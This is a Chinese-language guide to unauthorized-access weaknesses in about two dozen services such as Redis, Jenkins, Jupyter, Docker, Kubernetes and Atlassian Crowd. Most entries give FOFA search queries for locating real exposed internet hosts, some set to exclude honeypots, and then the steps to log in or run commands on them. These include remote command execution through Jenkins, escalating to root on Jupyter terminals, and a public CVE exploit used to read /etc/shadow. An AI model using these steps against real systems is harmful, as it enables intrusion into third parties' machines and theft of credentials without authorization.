未授权访问漏洞合集

未授权访问可以理解为需要安全配置或权限认证的地址、授权页面存在缺陷，导致其他用户可以直接访问，从而引发重要权限可被操作、数据库、网站目录等敏感信息泄露。日录遍历目前主要存在未授权访问漏洞的有:NFS 服务，Samba服务，LDAP，Rsync，FTPGitLab,Jenkins,MongoDB, Redis, ZooKeeper, ElasticSearch, Memcache,CouchDB，Docker,Solr,Hadoop,Dubbo 等...

一:Redis未授权访问漏洞 

1.在fofa上搜索 port="6379"找到一个具有未授权访问漏洞的网页（6379为默认的redis端口号）

2.输入redis-cli -h ip地址 -p 6379，进入后输入info显示成功

二:MongoDB未授权访问漏洞

1.fofa搜索port="27017" && country="US"，mongoDB的默认端口为27017

2.打开navicat进行连接连接名任意，主机填写找到的网址，点击测试连接

三:Memcached未授权访问漏洞

Windows 下安装 Memcached

1.解压在目录打开文件

2.在命令行输入memcached.exe -d install、memcached.exe -d start

3.打开kali输入telnet 存在漏洞的ip 11211

4.输入stats，查看memcache服务状态

5.使用nmap程序的脚本进行漏洞扫描，nmap -p 11211 --script memcached-info ip地址

四:Zookeeper未授权访问漏洞

1.使用fofa搜索端口号为2181的网站

2.在kali中输入 echo envi | nc 进行未授权访问漏洞测试

五:Jenkins未授权访问漏洞

1.在fofa中搜索 port="8080" && app="JENKINS" && title=="Dashboard [Jenkins]"

2.在打开的页面地址栏后加/manage/script/index.php

3.在其中输入println "whoami".execute().text找到他的用户名

六:Jupyter NoteBook未授权访问漏洞

1.在fofa中搜索"Jupyter Notebook" && port="8888" && "terminals"

2.找到一个不需要密码的网站证明存在未授权访问漏洞

3.新建一个终端

4.输入whomi、ls以及sudo su 进入root证明存在漏洞

七:Elasticsearch未授权访问漏洞

1.在fofa中搜索"Elasticsearch" && port="9200"

2.存在未授权漏洞可以直接访问

3.在地址栏后加/_nodes可以查看节点信息

八:Kibana未授权访问漏洞

1.在fofa中搜索"kibana" && port="5601"

2.直接进入说明有未授权访问漏洞

九:Docker Remote APl未授权访问漏洞

1.在fofa中搜索port="2375"

2.可以查看到info信息证明存在漏洞

十:Kubernetes Api Server未授权访问漏洞

1.在fofa中搜索port="8080" && app="Kubernetes"

2.进入可以看到api信息证明存在未授权访问漏洞

十一:Hadoop未授权访问漏洞

1.在fofa中搜索port="8088" && app="Hadoop"

2.打开页面直接访问不经过密码验证

十二:ActiveMQ未授权访问漏洞

1.在fofa中搜索body="ActiveMQ" && port="8161"

2.进入后点击manage

3.输入弱口令登录

十三:RabbitMQ未授权访问漏洞

1.在fofa中搜索port="15672"

2.输入弱口令guest/guest进入

十四:Springboot Actuator未授权访问漏洞

1.在fofa中搜索icon_hash="116323821"

2.

3.在地址栏后拼接一下路径查看泄露的数据

十五:JBoss未授权访问漏洞

1.在fofa中搜索title="'Welcome to JBoss"

2.在url后增加/jmx-console/进入控制台页面

十六:Ldap未授权访问漏洞

LDAP

1.进入页面下载

2.在fofa中搜索port="389"

3.选择新建，输入名称和主机名

4.点击测试连接

十七:Rsync未授权访问漏洞

1.在fofa中搜索  (port="873") && (is_honeypot=false && is_fraud=false)

2.在kali中打开终端输入  rsync rsync://ip:端口/

3.查看他的下级目录

十八:VNC未授权访问漏洞

1.在fofa中搜索(port="5900") && (is_honeypot=false && is_fraud=false)

2.vnc链接验证

十九:Dubbo未授权访问漏洞

1.使用fofa搜索  (app="APACHE-dubbo") && (is_honeypot=false && is_fraud=false)

2.打开kali 打开终端输入telnet ip port

二十:NSF共享目录未授权访问

1.安装nfs 

apt install nfs-common

2.fofa搜索nfs

3.输入showmount -e+地址

二十一:Druid未授权访问漏洞

1.使用fofa搜索 title="Druid Stat Index"

2.在打开的url后添加/druid/index.html，如果可以无需登录，即可登录到Druid监控界面，则说明该网站存在Druid未授权访问漏洞

二十二:CouchDB未授权访问

1.使用fofa搜索 (port="5984") && (is_honeypot=false && is_fraud=flase)

2.使用kali执行未授权访问测试命令 curl ip:port

3.输入curl ip:port/_config

二十三:Altassian Crowd未授权访问漏洞

1.输入命令git clone https://github.com/jas502n/CVE-2019-11580

2.cd CVE-2019-11580/ 

3.python2 CVE-2019-11580.py http://192.168.18.138:8095

4.curl http://192.168.18.138:8095/crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow

二十四:RTSP未授权访问漏洞

1.在fofa中搜索  (port="554") && (is_honeypot=false && is_fraud=false) && protocol="rtsp"

2.下载vlc 点击媒体-->打开网络串流

3.将找到的网址填入后点击播放